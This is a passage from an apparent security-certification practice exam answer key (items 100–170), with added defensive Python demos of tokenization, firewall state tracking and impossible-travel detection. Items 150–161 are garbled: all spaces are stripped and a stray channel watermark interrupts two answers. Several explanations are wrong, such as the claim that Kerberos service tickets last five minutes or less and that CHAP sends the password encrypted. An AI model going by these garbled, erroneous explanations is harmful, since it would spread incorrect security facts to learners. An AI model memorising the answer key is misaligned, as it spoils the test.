100. B. Tokenization is used to protect data by substituting tokens for sensitive data without changing the length or data type. This allows databases to handle the data in the same way as it was prior to tokenization, ensuring that existing software will not run into problems due to the data being changed. Encryption provides similar protection but will normally change either the data length, the data type, or both. Hashing is one-way, which means it is not a good fit for many scenarios where tokenization or encryption will protect data. Rotation is not a security method used for this type of work.
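An added example of the format-preserving property answer 100 relies on; it is not code from the book. The TokenVault class below is a constructed in-memory stand-in for a real token vault: it replaces a numeric value with a random token of the same length and character class (optionally keeping the last digits for display), remembers the mapping so only vault holders can detokenize, and is idempotent for repeated values. The hashed_alternative function shows the contrast the answer draws: a SHA-256 digest is 64 hex characters, not digits-only, and cannot be reversed, so a column sized for a 16-digit value would reject it. The sample card number is a constructed test value.

```python
import hashlib
import secrets

DIGITS = "0123456789"


class TokenVault:
    """Constructed in-memory vault for the demo: maps tokens back to the
    sensitive values they replace. A real vault is a separate, hardened store."""

    def __init__(self):
        self._token_to_value = {}
        self._value_to_token = {}

    def tokenize(self, value, keep_last=4):
        """Replace a numeric string with a random token of the same length and
        character class, optionally keeping the last digits for display."""
        if not value.isdigit():
            raise ValueError("this demo tokenizes numeric strings only")
        if value in self._value_to_token:      # idempotent: same value, same token
            return self._value_to_token[value]
        keep_last = min(keep_last, len(value) - 1)   # always randomize at least one digit
        tail = value[-keep_last:] if keep_last > 0 else ""
        head_len = len(value) - len(tail)
        while True:
            head = "".join(secrets.choice(DIGITS) for _ in range(head_len))
            token = head + tail
            if token != value and token not in self._token_to_value:
                break
        self._token_to_value[token] = value
        self._value_to_token[value] = token
        return token

    def detokenize(self, token):
        """Only code with vault access can recover the original value."""
        return self._token_to_value[token]


def format_preserved(value, token):
    """The property the explanation relies on: length and data type unchanged."""
    return len(token) == len(value) and token.isdigit() == value.isdigit()


def hashed_alternative(value):
    """For contrast: a SHA-256 hex digest is 64 characters, not digits-only,
    and cannot be reversed, so existing column definitions would break."""
    return hashlib.sha256(value.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    vault = TokenVault()
    pan = "4111111111111111"        # constructed test card number
    tok = vault.tokenize(pan)
    print(pan, "->", tok, "| format preserved:", format_preserved(pan, tok))
    print("hash would be", len(hashed_alternative(pan)), "characters instead")
```

The application layer and database keep working on the token exactly as they did on the original value; only the component that holds the vault can map it back.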
101. A. Elenora could deploy a log aggregator at each location to collect and aggregate the logs. Log collection and aggregation systems can then filter unneeded log entries, compress the logs, and forward desired logs to a central security system like a security information and event management (SIEM) or other log collection and analysis tool. A honeypot acts like a desirable target, luring attackers in to capture data about their attacks. A bastion host is designed to resist attacks and normally provides a single service to the network on which it resides.
102. D. Fuzzing is an automated, dynamic software testing technique that sends unexpected and often invalid data to a program to test how it responds. The software is monitored to see how it responds to the input, providing additional assurance that the program has proper error handling and input validation built in. Timeboxing is an agile project management technique; buffer overflows may occur as part of fuzzing, but are not the only technique used or described here; and input validation can help stop fuzzing from causing problems for an application by preventing out-of-bounds or unwanted data from being accepted.
103. B. Dynamic Host Configuration Protocol (DHCP) snooping can be set up on switches to monitor for and stop rogue DHCP traffic from unknown servers. Disabling DHCP snooping would remove this feature. Intrusion detection systems (IDSs) cannot stop traffic, and blocking DHCP traffic would prevent systems from acquiring dynamic IP addresses.
104. B. Endpoint detection and response (EDR) focuses on identifying anomalies and issues, but it is not designed to be a malware analysis tool. Instead, the ability to search and explore data, identify suspicious activities, and coordinate responses is what makes up an EDR tool.
105. A. A web proxy can be used to block certain websites. It is common practice for network administrators to block either individual sites or general classes of sites (like job-hunting sites). Network address translation (NAT) is used to translate the private IP addresses of internal computers to public IP addresses. A packet filter firewall can block traffic on a given port or IP address or using a particular protocol, but generally they are not able to block specific websites. Network-based intrusion prevention systems (NIPSs) identify and block attacks; they cannot prevent users from visiting specific websites.
106. C. Secrets management services provide the ability to store sensitive data like application programming interface (API) keys, passwords, and certificates. They also provide the ability to manage, retrieve, and audit those secrets. A public key infrastructure (PKI) would focus on certificates and encryption keys, without passwords or API keys. A Trusted Platform Module (TPM) is associated with hardware, and a hush service was made up for this question.
107. A. SAML, the Security Assertion Markup Language, is used by many identity providers to exchange authorization and authentication data with service providers. Kerberos and LDAP (Lightweight Directory Access Protocol) are used inside many organizations, but Fred will find more success with SAML for popular web services. New Technology LAN Manager (NTLM) remains in use for Windows systems, but Kerberos is more commonly used for modern Windows domains and would not be used in the scenario described here.
108. D. Load balancing the cluster will prevent any single server from being overloaded. And if a given server is offline, other servers can take on its workload. Option A is incorrect. A VPN concentrator, as the name suggests, is used to initiate virtual private networks (VPNs). Option B is incorrect. Aggregate switching can shunt more bandwidth to the servers but won't mitigate the threat of one or more servers being offline. Option C is incorrect. SSL accelerators are a method of offloading processor-intensive public-key encryption for Transport Layer Security (TLS) and Secure Sockets Layer (SSL) to a hardware accelerator.
109. C. The three channels that do not overlap are 1, 6, and 11. The rest of the channels will overlap. In an ideal installation, these three channels can be used to maximize throughput and minimize interference.
110. B. The correct answer is to encrypt all the web traffic to this application using Transport Layer Security (TLS). This is one of the most fundamental security steps to take with any website. A web application firewall (WAF) is probably a good idea, but it is not the most important thing for Ryan to implement. While a network-based intrusion prevention system (IPS) or intrusion detection system (IDS) may be a good idea, those should be considered after TLS is configured.
111. B. Infrared (IR) is the only line-of-sight method on the list. Although Near-Field Communication (NFC) and Bluetooth have a relatively short range, they can still operate through materials placed between them and the receiver, and Wi-Fi can do so at an even longer range.
112. A. The correct answer is that Kerberos uses various tickets, each with a time limit. The service tickets are typically only good for 5 minutes or less. This means that if the Network Time Protocol (NTP) is failing, valid tickets may appear to be expired. RADIUS, CHAP, and LDAP will not have any significant effect due to NTP failure.
113. C. The correct answer is that Challenge Handshake Authentication Protocol (CHAP) periodically has the client reauthenticate. This is transparent to the user but is done specifically to prevent session hijacking. Password Authentication Protocol (PAP) is actually quite old and does not reauthenticate. In fact, it even sends the password in cleartext, so it should not be used any longer. SPAP (Shiva Password Authentication Protocol) adds password encryption to PAP but does not reauthenticate. OAuth is used in web authentication and does not reauthenticate.
114. B. A software firewall is best suited to deployments to individual machines, particularly when endpoint systems are being protected. Hardware firewalls are typically deployed to protect network segments or groups of systems, and result in additional expense and management. Virtual and cloud firewalls are most often deployed in datacenters where virtual or cloud environments are in use, although a virtual firewall could be run on an endpoint.
115. D. A service account is the most appropriate in this scenario. Service accounts are given the least privileges the service needs and are used by the service, without the need for a human user. Although you could assign a user account, it is not as good a solution as using a service account. A guest account would never be a good idea for a service. Guest accounts are typically too limited. It's common practice to disable default accounts such as the Guest account. An admin account would give too many privileges to the service and violate the principle of least privilege.
116. A. Of these versions of Extensible Authentication Protocol (EAP), only Lightweight Extensible Authentication Protocol (LEAP) does not support TLS. EAP Tunneled Transport Layer Security (EAP-TTLS) actually extends TLS, but supports the underlying protocol. Protected Extensible Authentication Protocol (PEAP) encapsulates EAP within an encrypted TLS tunnel.
117. C. Jailbreaking allows users to add software to an iPhone that isn't normally allowed, including third-party applications, changing system settings, themes, or default applications. Third-party application stores aren't available by default, and side-loading can be accomplished in iOS but doesn't do what Manny wants it to, and of course installing Android won't let Manny change iOS settings. If Manny does jailbreak his phone, his organization may notice if they're using a mobile device management (MDM) or unified endpoint management (UEM) application to track the status of the device.
118. C. Many smart cards implement Radio Frequency Identification (RFID) to allow them to be used for entry access and other purposes. Wi-Fi, Infrared, and Bluetooth generally require powered circuits to interact with systems, making them a poor fit for a smart card that does not typically have a battery or other power source.
119. A. Mandatory access control (MAC) is the correct solution. It will not allow lower privileged users to even see the data at a higher privilege level. Discretionary access control (DAC) has each data owner configure his or her own security. Role-based access control (RBAC) could be configured to meet the needs, but it's not the best solution for these requirements. Security Assertion Markup Language (SAML) is not an access control model.
120. B. An agent-based, preadmission system will provide greater insight into the configuration of the system using the agent, and using a preadmission model will allow the system configuration to be tested before the system is allowed to connect to the network. Agentless NAC uses scanning and/or network inventory techniques and will typically not have as deep a level of insight into the configuration and software versions running on a system. Postadmission systems make enforcement decisions based on what users do after they gain admission to a network, rather than prior to gaining admission, allowing you to quickly rule out two of these options.
121. C. Claire's best option is to deploy a detection and fix via her web application firewall (WAF) that will detect the SQL injection attempt and prevent it. An intrusion detection system (IDS) only detects attacks and cannot stop them. Manually updating the application code after reverse-engineering it will take time, and she may not even have the source code or the ability to modify it. Finally, vendor patches for zero days typically take some time to come out even in the best of circumstances, meaning that Claire could be waiting on a patch for quite a while if that is the option she chooses.
122. C. CYOD, or choose your own device, allows users to choose a device that is corporate owned and paid for. Choices may be limited to a set of devices, or users may be allowed to choose essentially any device depending on the organization's deployment decisions. BYOD allows users to bring their own device, whereas COPE, or corporate-owned, personally enabled, provides devices to users that they can then use for personal use. VDI uses a virtual desktop infrastructure as an access layer for any security model where specialized needs or security requirements may require access to remote desktop or application services.
123. B. The key element here is that the certificate authorities (CAs) are operating in a mesh, meaning no CA is the root CA and that each must trust the others. To accomplish this, Derek first needs to issue certificates from D to each of the other CAs and then have the others issue D a certificate. Private keys should never be exchanged, and of course if he only has the other systems issue D certificates, they won't recognize his server.
124. C. If Claire is using Simple Network Management Protocol (SNMP) to manage and monitor her network devices, she should make sure she is using SNMPv3 and that it is properly configured. SNMPv3 can provide information about the status and configuration of her network devices. Remote Authentication Dial-In User Service (RADIUS) might be used to authenticate to the network, but Transport Layer Security (TLS) and SSH File Transfer Protocol (SFTP) are not specifically used for the purposes described.
125. D. Fuzzers send unexpected and out-of-range data to applications to see how they will respond. In this case, Ben is using a fuzzer. Web proxies are often used to do application testing because they allow data to be changed between the browser and the application. SQL injection may be done via a web proxy, but a dedicated SQL injection proxy is not a type of tool by itself. Finally, a static code review tool is used to review source code and may be as simple as a Notepad application or as complex as a fully integrated development environment (IDE).
126. B. Containerization will allow Eric's company's tools and data to be run inside of an application-based container, isolating the data and programs from the self-controlled bring your own device (BYOD) devices. Storage segmentation can be helpful, but the operating system itself as well as the applications would remain a concern. Eric should recommend full-device encryption (FDE) as a security best practice, but encrypting the container and the data it contains can provide a reasonable security layer even if the device itself is not fully encrypted. Remote wipe is helpful if devices are lost or stolen, but the end user may not be okay with having the entire device wiped, and there are ways to work around remote wipes, including blocking cellular and Wi-Fi signals.
127. B. Kerberos does not send the user's password across the network. When the user's name is sent to the authentication service, the service retrieves the hash of the user's password from the database, and then uses that as a key to encrypt data to be sent back to the user. The user's machine takes the password that the user entered, hashes it, and then uses that as a key to decrypt what was sent back by the server. Challenge Handshake Authentication Protocol (CHAP) sends the user's password in an encrypted form. RBAC is an access control model, not an authentication protocol. Type II authentication is something you have, such as a key or card.
128. A. EV, or extended validation, certificates prove that the X.509 certificate has been issued to the correct legal entity. In addition, only specific certificate authorities (CAs) can issue EV certificates. Domain-validated certificates require proof that you have control of the domain, such as setting the DNS TXT record or responding to an email sent to a contact in the domain's Whois record. An organizational validation certificate requires domain validation and additional proof that the organization is a legal entity. OCSP certificates were made up for this question.
129. D. Wi-Fi 5 networks can provide theoretical throughput up to 3.5 Gbps, although newer standards like Wi-Fi 6 continue to push this higher. The next fastest wireless standard listed is LTE cellular with theoretical throughputs around 50 megabits per second. When bandwidth is important, Wi-Fi will tend to win, although 5G cellular networks under ideal conditions may rival Wi-Fi.
130. C. The cost of applications and the quality of the security implementation can vary based on the vendor and product, but cloud-native security solutions will generally have better and deeper integration into the cloud platform than third-party solutions will. Vendor diversity in designs may still drive other choices, but those are conscious design decisions.
131. D. Jump boxes are a common solution for providing access to a network with a different security profile. In this case, Ed can deploy a jump box in the demilitarized zone (DMZ) to allow users within his administrative zone to perform tasks without directly connecting to the world-exposed DMZ. This helps keep administrative systems secure and allows him to focus on the security of the jump box, while also making it easier to monitor and maintain. An intrusion prevention system (IPS) is used to monitor and block unwanted traffic, but isn't used for remote access. A NAT gateway performs network address translation and is placed between networks but is not typically used to provide secure connections between networks. Instead, it serves to reduce the number of public IP addresses used and to provide some limited security for systems behind it. Routers are used to connect to networks but are not used to provide secure access as described in the question.
132. C. OAuth (Open Authorization) is an open standard for token-based authentication and authorization on the Internet and allows an end user's account information to be used by third-party services, without exposing the user's password. Kerberos is a network authentication protocol and not used for cross-domain/service authentication. Security Assertion Markup Language (SAML) is an XML-based, open-standard data format for exchanging authentication and authorization data between parties. OpenID is an authentication service often provided by a third party, and it can be used to sign into any website that accepts OpenID. It would be possible for this to work, but only with websites that support OpenID, so it is not as good a solution as OAuth.
133. A. Session persistence makes sure that all of a client's traffic for a transaction or session goes to the same server or service. The remaining options do not properly describe how session persistence works.
134. B. Data loss prevention (DLP) tools allow sensitive data to be tagged and monitored so that if a user attempts to send it, they will be notified, administrators will be informed, and if necessary, the data can be protected using encryption or other protection methods before it is sent. Full-disk encryption (FDE) would protect data at rest, and S/MIME and POP3S would protect mail being retrieved from a server but would not prevent the SSNs from being sent.
135. B. While infrastructure as a service (IaaS) vendors often provide strong support for high availability, including replication to multiple geographic zones or regions, as well as highly reliable and secure storage, they do not allow direct access to the underlying hardware in most instances. If Jennifer requires direct access to hardware, she will need to deploy to a datacenter where she can retain access to the physical servers.
136. B. Out-of-band (OOB) management uses separate management interfaces, as shown in the figure, or a different connectivity method than the normal connection to provide a secure means of managing systems. A DMZ, or demilitarized zone, is a security zone that is typically exposed to the world and is thus less trusted and more exposed. In-band management uses common protocols like Secure Shell (SSH) or HTTPS to manage devices via their normal interfaces or network connections. Transport Layer Security (TLS) is a security protocol, not a management interface.
137. A. Key escrow provides encryption keys to a third party so that they can be released to an appropriate party if certain conditions are met. Although this means that the keys are out of the control of the owning or responsible party, in many cases the need to have a recoverable or accessible way to get to the keys overrides the requirement to keep the keys in a single individual's or organization's hands. The remaining options were made up, but you may encounter the term "key recovery," which is a process where law enforcement or other parties may recover keys when needed using a process that provides them with an access key or decryption key that may not be the same key as the key used by the original encryption user.
138. D. Boot attestation requires systems to track and measure the boot process and to then attest to a system that the process was secure. Secure boot, which is a related concept, allows only trusted software to be run using previously hashed values to ensure the process is secure. BOOTP and BIOS are not involved in this process; instead, Unified Extensible Firmware Interface (UEFI) firmware supports both secure boot and boot attestation.
139. A. The correct answer is that OpenID is an authentication service often done by a third party, and it can be used to sign into any website that accepts OpenID. Kerberos is a network authentication protocol for use within a domain. New Technology LAN Manager (NTLM) is an older Windows authentication protocol. Shibboleth is a single sign-on system, but it works with federated systems.
140. C. Disabling remote registry access for systems that do not require it can prevent remote registry modification and reads. This is a recommended best practice whenever possible, but some systems may require remote registry access for management or other reasons. The Windows registry is not independently patched, the registry needs to be readable and writable to have a functional Windows system, and there is no mode that encrypts user keys.
141. D. Maximizing coverage overlap would cause greater contention between access points. Instead, installations should minimize overlap without leaving dead spots in important areas. Performing a site survey, controlling power levels and adjusting them to minimize contention, and designing around the construction materials of a building are all important parts of designing the physical layout and placement of WAPs. Fortunately, modern enterprise wireless networks have advanced intelligent features that help do many of these things somewhat automatically.
142. B. Disabling the account is the best option to meet Mark's needs. Disabling an account will leave it in a different state than an active account or one with a changed password, which should be noted by support staff if Gabby called and asked to change her password. That means that there is less risk of a disgruntled employee or an attacker successfully gaining access to the account. At the same time, disabling is less destructive than deleting the account, making it faster to restore and preserving her files and other materials. Most organizations will choose to have a time limit for how long an account can be in a disabled state without review or moving to another account state to help ensure that disabled accounts do not build up over time.
143. A. Attribute-based access control (ABAC) looks at a group of attributes, in addition to the login username and password, to make decisions about whether or not to grant access. One of the attributes examined is the location of the person. Since the users in this company travel frequently, they will often be at new locations, and that might cause ABAC to reject their logins. Wrong passwords can certainly prevent login, but are not specific to ABAC. ABAC does not prevent remote access, and a firewall can be configured to allow, or prohibit, any traffic you wish.
144. B. Single Sign-On (SSO) is designed specifically to address this risk and would be the most helpful. Users have only a single logon to remember; thus, they have no need to write down the password. OAuth (Open Authorization) is an open standard for token-based authentication and authorization on the Internet. It does not eliminate the use or need for multiple passwords. Multifactor authentication helps prevent risks due to lost passwords, but does not remove the need for multiple passwords by itself. Security Assertion Markup Language (SAML) and Lightweight Directory Access Protocol (LDAP) do not stop users from needing to remember multiple passwords.
145. D. Rule-based access control applies a set of rules to an access request. Based on the application of the rules, the user may be given access to a specific resource that they were not explicitly granted permission to. MAC, DAC, and role-based access control wouldn't give a user access unless that user has already been explicitly given that access.
146. B. Segmentation needs between multiple cloud virtual datacenters, the cost of operating the firewall service, and the visibility into traffic provided by the cloud service provider are all design elements Ed will need to consider. He won't, however, need to worry about hardware access for updates. Instead, he is likely to either use a virtual cloud appliance or built-in firewall functionality provided by the cloud infrastructure service provider.
147. B. Tokens are physical devices that often contain cryptographic data for authentication. They can store digital certificates for use with authentication. OAuth (Open Authorization) is an open standard for token-based authentication and authorization on the Internet. The user still must remember a password. OpenID is a third-party authentication service, and just as with OAuth, the user also still must remember a password. Role-based access control and rule-based access control (which both use the acronym RBAC) are access control models.
148. A. Internal services like this are part of an intranet, a network or website only accessible to individuals and systems inside of a company. Extranets are private networks that allow access to partners or customers, but not to the general public. A demilitarized zone (DMZ) is a network segment exposed to the Internet or another untrusted network. A TTL is a network term that means time to live, and it determines how many hops a packet can make before it is no longer able to be sent to another hop.
149. B. This question describes a stateless firewall, which looks at every packet to make decisions about what will be allowed through it. Stateful firewalls pay attention to the conversations and allow packets in a conversation between devices to pass through once they have verified the initial exchange. Next-generation firewalls (NGFWs) build in a wide variety of security services. Application-layer firewalls understand applications that run through them and provide deeper packet analysis capabilities to block unwanted application layer traffic.
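The difference answer 149 draws between stateless and stateful filtering, shown as an added example (not code from the book). Both firewalls below see the same three constructed packets: an inside client opening HTTPS to a web server, the server's reply, and an unsolicited packet from an unrelated host that happens to use source port 443. The stateless filter can only let the reply through by also permitting any packet with source port 443, so it passes the unsolicited one too. The stateful filter records the permitted opening in a connection table and allows only packets that match an entry, so the unsolicited packet is dropped. Addresses, ports, and the `syn` flag are assumptions for the demo.

```python
from collections import namedtuple

# src/dst are IP strings, sport/dport ints, syn marks a connection-opening packet.
Packet = namedtuple("Packet", "src sport dst dport syn")


class StatelessFirewall:
    """Every packet is judged on its own header fields; nothing is remembered."""

    def __init__(self, rules):
        self.rules = rules                  # ordered list of (predicate, verdict)

    def check(self, pkt):
        for predicate, verdict in self.rules:
            if predicate(pkt):
                return verdict
        return "drop"                       # implicit deny


class StatefulFirewall:
    """Only permitted connection openings create state; replies are allowed
    because they match an entry in the connection table."""

    def __init__(self, allow_new):
        self.allow_new = allow_new          # predicate for permitted new connections
        self.table = set()                  # established flows as 4-tuples

    def check(self, pkt):
        flow = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        reverse = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if flow in self.table or reverse in self.table:
            return "allow"                  # part of a conversation already verified
        if pkt.syn and self.allow_new(pkt):
            self.table.add(flow)
            return "allow"
        return "drop"


# Constructed traffic: inside client opens HTTPS, the server replies, and an
# unrelated outside host sends an unsolicited packet from source port 443.
CLIENT, WEB, OUTSIDER = "10.0.0.5", "192.0.2.10", "203.0.113.9"
SYN = Packet(CLIENT, 51000, WEB, 443, syn=True)
REPLY = Packet(WEB, 443, CLIENT, 51000, syn=False)
UNSOLICITED = Packet(OUTSIDER, 443, CLIENT, 51000, syn=False)


def run_scenario():
    """Return the verdicts each firewall gives to the three packets, in order."""
    # Stateless rules: to let replies back in, the admin must also permit any
    # packet with source port 443, which the unsolicited packet satisfies too.
    stateless = StatelessFirewall([
        (lambda p: p.dport == 443, "allow"),
        (lambda p: p.sport == 443, "allow"),
    ])
    stateful = StatefulFirewall(
        allow_new=lambda p: p.src.startswith("10.0.0.") and p.dport == 443
    )
    packets = (SYN, REPLY, UNSOLICITED)
    return {
        "stateless": [stateless.check(p) for p in packets],
        "stateful": [stateful.check(p) for p in packets],
    }


if __name__ == "__main__":
    print(run_scenario())
```

The stateful table is also what makes the firewall's memory a resource: real implementations age entries out and cap table size so that a flood of openings cannot exhaust it.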
150. C. Hardwaresecuritymodulesareavailableassmartcards,microSDcards,andUSBthumbdrivesinadditiontotheirfrequentdeploymentasappliancesinenterpriseuse.NancycouldpurchaseacertifiedandtestedMicroSDcard–basedHSMthatwouldprotectherkeysinasecureway.Anapplication-basedpublickeyinfrastructure(PKI)wouldnotprovidethesamelevelofsecurityonmostmobiledeviceswithoutspeciallydesignedhardware,whichisnotmentionedinthisproblem.OPALisahardware-basedencryptionstandardanddoesnotprovidekeymanagement,andanofflinecertificateauthority(CA)wouldnothelpinthiscircumstance.
151. D. BoththeWindowsandLinuxfilesystemsworkbasedonadiscretionaryaccesscontrolschemewherefileanddirectoryownerscandeterminewhocanaccess,change,orotherwiseworkwithfilesundertheircontrol.Role-basedaccesscontrolssystemsdeterminerightsbasedonrolesthatareassignedtousers.Rule-basedaccesscontrolsystemsuseaseriesofrulestodeterminewhichactionscanoccur,andmandatoryaccesscontrolsystemsenforcecontrolattheoperatingsystemlevel.
152. A. Restrictingeachfacultyaccountsothatitisonlyusablewhenthatparticularfacultymemberistypicallyoncampuswillpreventsomeonefromlogginginwiththataccountafterhours,eveniftheyhavethepassword.Usageauditingmaydetectmisuseofaccountsbutwillnotpreventit.Longerpasswordsareeffectivesecurity,butalongerpasswordcanstillbestolen.Credentialmanagementisalwaysagoodidea,butit
Telegram Channel @nettrain
won’taddressthisspecificissue.
153. D. Althoughnext-generationfirewallsprovidemaydefensivecapabilities,SQLinjectionisanattackinsteadofadefense.Inadditiontogeolocation,intrusiondetectionsystem(IDS)andintrusionpreventionsystem(IPS),andsandboxingcapabilities,manynext-generationfirewallsincludewebapplicationfirewalls,loadbalancing,IPreputationandURLfiltering,andantimalwareandantivirusfeatures.
154. C. Enablingstormcontrolonaswitchwilllimittheamountoftotalbandwidththatbroadcastpacketscanuse,preventingbroadcaststormsfromtakingdownthenetwork.BlockingAddressResolutionProtocol(ARP)wouldpreventsystemsfromfindingeachother,andblockingallbroadcastpacketswouldalsoblockmanyimportantnetworkfeatures.
155. B. Demilitarizedzones(DMZs)remainausefulconceptwhendesigningcloudenvironments,althoughthetechnicalimplementationmayvary,sincecloudprovidersmayhavesecurewebservices,load-balancingcapabilitiesorotherfeaturesthatmakeDMZslookdifferent.Proxyserversareusefulforcontrolling,filtering,andrelayingtraffic,buttheydonotprovidethefullsegmentationthatIsaacislookingfor.AVPCisavirtualdatacenterandwilltypicallycontainhisinfrastructurebutdoesnotspecificallyaddresstheseneeds.
156. A. Apermissionsauditwillfindwhatpermissionseachuserhasandcomparethattotheirjobrequirements.Permissionauditsshouldbeconductedperiodically.Jobrotation,thoughbeneficialforothersecurityreasons,willactuallyexacerbatethisproblem.Itisimpracticaltoforbidanyonefromeverchangingjobroles,andseparationofdutieswouldhavenoimpactonthisissue.
157. B. Susan’sbestoptionistodeployfull-diskencryption(FDE),whichwillensurethattheentiredriveisencrypted,ratherthanjustspecificfoldersorfiles.Degaussingmagneticdriveswillwipethem,ratherthanprotectingdata.
158. C. Passwordcomplexityrequiresthatpasswordshaveamixtureofuppercaseletters,lowercaseletters,numbers,andspecialcharacters.Thiswouldbethebestapproachtocorrecttheproblemdescribedinthequestion.Longerpasswordsareagoodsecuritymeasurebutwillnotcorrecttheissuepresentedhere.Changingpasswordswon’tmakethosepasswordsanystronger,andSingleSign-On(SSO)willhavenoeffectonthestrength
Telegram Channel @nettrain
ofpasswords.
159. D. WPA3’sPersonalmodereplacesthepresharedkeymodefoundinWPA2withsimultaneousauthenticationofequals.Thismakesweakpassphraseorpasswordattackshardertoconductandallowsforgreatersecuritywhendevicesareconductingtheirinitialkeyexchange.WEP,WPA,andWPA2donotimplementSAE.
160. C. Meganhascreatedaguestaccount.Guestaccountstypicallyhaveverylimitedprivilegesandmaybesetupwithlimitedloginhours,anexpirationdate,orothercontrolstohelpkeepthemmoresecure.Useraccountsarethemostcommontypeofaccountandareissuedtoindividualstoallowthemtologintoandusesystemsandservices.Sharedaccountsareusedbymorethanoneperson,makingitdifficulttodeterminewhousedtheaccount.Aserviceaccountistypicallyassociatedwithaprogramorservicerunningonasystemthatrequiresrightstofilesorotherresources.
161. B. APIkeysallowindividualcustomerstoauthenticatetotheAPIservice,whichmeansthatifthereisaproblemHenrycandisabletheproblematicAPIkeysratherthanallusers.EnablingloggingusingaservicelikeAmazon’sAPIGatewayallowsscalability,logging,andmonitoring,aswellastoolslikewebapplicationfirewalls.AnAPIproxyandAPI-centricintrusionpreventionsystem(IPS)weremadeupforthisquestion.
162. C. UTM, or unified threat management, devices commonly serve as firewalls, intrusion detection system (IDS)/intrusion prevention system (IPS), antivirus, web proxies, web application and deep packet inspection, secure email gateways, data loss prevention (DLP), security information and event management (SIEM), and even virtual private networking (VPN) devices. They aren't mobile device management (MDM) or unified endpoint management (UEM) devices, however, since their primary focus is on network security, not systems or device management.
163. B. Mandatory access control (MAC) is based on documented security levels associated with the information being accessed. Role-based access control (RBAC) is based on the role the user is placed in. Discretionary access control (DAC) lets the data owner set access control. BAC is not an access control model.
164. A. This image shows a forward proxy, which can be used to apply policies to user requests sent to web servers and other services. Reverse proxies act as gateways between users and application servers, allowing content caching and traffic manipulation. They are often used by content delivery networks to help with traffic management.
165. B. This type of potential security issue is typically recorded as an impossible travel time/risky login issue. Gurvinder would not expect the user to have traveled between two locations in an hour; in fact, it is impossible to do so. That means he needs to contact the user to find out if they may have done something like use a VPN, or if their account may be compromised. It is possible this could be an issue with the geo-IP system that Gurvinder's company uses, but he needs to treat it like a security risk until he determines otherwise, and a compromise is more likely in most cases. A misconfigured IP address would not cause this issue.
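The impossible-travel check described in the answer above, as an added example that is not part of the book: it sorts login events per user, looks up each source IP in a geo-IP table, computes the great-circle distance between consecutive logins, and flags any pair that would require travelling faster than a chosen ceiling. The geo-IP table, the 1000 km/h ceiling, the log format, and the login lines are all constructed assumptions; a real deployment would pull events from the identity provider and query a geo-IP database, and a flagged user may still turn out to be on a VPN.

```python
"""Impossible-travel detection over login records.

Added example (not from the book). The geo-IP lookup is a hypothetical
in-memory table and the login lines are constructed sample data; a real
deployment would query a geo-IP database and pull events from the IdP.
"""
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Hypothetical geo-IP table: ip -> (city, latitude, longitude). Constructed.
GEOIP = {
    "203.0.113.10": ("Chicago", 41.8781, -87.6298),
    "198.51.100.7": ("London", 51.5074, -0.1278),
    "192.0.2.44": ("Milwaukee", 43.0389, -87.9065),
}

# Fastest plausible travel (commercial flight) in km/h; faster is "impossible".
MAX_SPEED_KMH = 1000.0

# Constructed sample log lines: "<ISO 8601 UTC> <user> <source ip>".
SAMPLE_LOGINS = [
    "2021-03-01T09:00:00Z gurvinder 203.0.113.10",  # Chicago
    "2021-03-01T10:00:00Z gurvinder 198.51.100.7",  # London, one hour later
    "2021-03-01T09:30:00Z alice 203.0.113.10",      # Chicago
    "2021-03-01T11:30:00Z alice 192.0.2.44",        # Milwaukee, two hours later
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two lat/lon points."""
    earth_radius_km = 6371.0
    dlat = radians(lat2 - lat1)
    dlon = radians(lon2 - lon1)
    a = (sin(dlat / 2) ** 2
         + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2)
    return 2 * earth_radius_km * asin(sqrt(a))


def parse_login(line):
    """Split one log line into (timestamp, user, ip)."""
    ts, user, ip = line.split()
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), user, ip


def find_impossible_travel(lines, max_speed_kmh=MAX_SPEED_KMH):
    """Return (user, from_city, to_city, hours, km_per_hour) for every pair of
    consecutive logins by the same user that would require travelling faster
    than max_speed_kmh. Logins from IPs with no geo-IP entry are skipped."""
    events = sorted((parse_login(line) for line in lines), key=lambda e: e[0])
    last_seen = {}   # user -> (timestamp, city, lat, lon)
    findings = []
    for ts, user, ip in events:
        if ip not in GEOIP:
            continue
        city, lat, lon = GEOIP[ip]
        if user in last_seen:
            prev_ts, prev_city, prev_lat, prev_lon = last_seen[user]
            distance = haversine_km(prev_lat, prev_lon, lat, lon)
            hours = (ts - prev_ts).total_seconds() / 3600.0
            # Two logins at the same instant from different places is also impossible.
            if hours > 0:
                speed = distance / hours
            else:
                speed = float("inf") if distance > 0 else 0.0
            if speed > max_speed_kmh:
                findings.append((user, prev_city, city, round(hours, 2), round(speed)))
        last_seen[user] = (ts, city, lat, lon)
    return findings


if __name__ == "__main__":
    for finding in find_impossible_travel(SAMPLE_LOGINS):
        print("impossible travel:", finding)
```

Running the block reports only gurvinder's Chicago-to-London hop (roughly 6,350 km in one hour); alice's Chicago-to-Milwaukee move in two hours is well under the ceiling and is not reported.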
166. A. Discretionary access control (DAC) allows data owners to assign permissions. Role-based access control (RBAC) assigns access based on the role the user is in. Mandatory access control (MAC) is stricter and enforces control at the OS level. Attribute-based access control (ABAC) considers various attributes such as location, time, and computer in addition to username and password.
167. A. OS hardening is the process of securing an operating system by patching, updating, and configuring the operating system to be secure. Configuration management is the ongoing process of managing configurations for systems, rather than this initial security step. Both security uplift and endpoint lockdown were made up for this question.
168. D. Secure Lightweight Directory Access Protocol (LDAPS) uses port 636 by default. DNS uses port 53, LDAP uses 389, and secure HTTP uses port 443.
169. C. The best answer for the needs Chris has identified is a hardware security module, or HSM. HSMs can act as a cryptographic key manager, including creating, storing, and securely handling encryption keys and certificates. They can also act as cryptographic accelerators, helping offload encryption functions like Transport Layer Security (TLS) encryption. A TPM (Trusted Platform Module) is a device used to store keys for a system but does not offload crypto processing, and it is used for keys on a specific system rather than broader uses. CPUs and GPUs may have cryptographic acceleration functions, but they do not securely store or manage certificates and other encryption artifacts.
170. D. A host-based intrusion prevention system (HIPS) can monitor network traffic to identify attacks, suspicious behavior, and known bad patterns using signatures, and can block them. A firewall stops traffic based on rules; antimalware tools are specifically designed to stop malware, not attacks and suspicious network behavior; and a host-based intrusion detection system (HIDS) can only detect, not stop, these behaviors.
